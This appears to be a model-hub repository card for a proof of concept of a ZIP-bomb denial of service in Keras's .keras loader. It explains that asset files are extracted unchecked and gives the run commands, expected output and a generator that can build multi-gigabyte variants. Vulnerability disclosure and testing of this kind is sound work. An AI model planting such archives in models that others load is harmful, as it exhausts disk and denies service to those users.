YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
Keras Native .keras asset ZIP bomb PoC
This repository contains a deterministic proof of concept for a Keras Native model-format denial of service in Keras 3.15.0 (keras-team/keras commit b49fde7f913c71d6e5dbd2a796ef45e1499b49eb).
keras.saving.load_model() rejects ZIP bombs for config.json and model.weights.h5, but any extra archive member causes DiskIOStore(_ASSETS_DIRNAME, archive=zf, mode="r") to call file_utils.extract_open_archive(self.archive, self.tmp_dir). That extracts the entire .keras archive, including assets/*, without checking per-member expansion ratio or total extracted size.
The included keras-asset-bomb-128m.keras is a tiny valid Keras model archive with one compressed asset:
- archive size: about 142 KB
assets/bomb.bincompressed size: about 130 KBassets/bomb.binuncompressed size: 128 MiB- expansion ratio: about 1029x
Run:
python -m venv .venv
. .venv/bin/activate
pip install -e /path/to/keras scipy jax[cpu]
KERAS_BACKEND=numpy python verify_keras_asset_bomb.py keras-asset-bomb-128m.keras
Expected output includes:
loaded_model_type=Sequential
extract_calls=1
extract_0_bytes_written=134228929
extract_0_bomb_exists=True
extract_0_bomb_size=134217728
make_keras_asset_bomb.py can generate larger artifacts with --asset-size 5g; do not run large variants on shared or low-disk systems.
- Downloads last month
- 24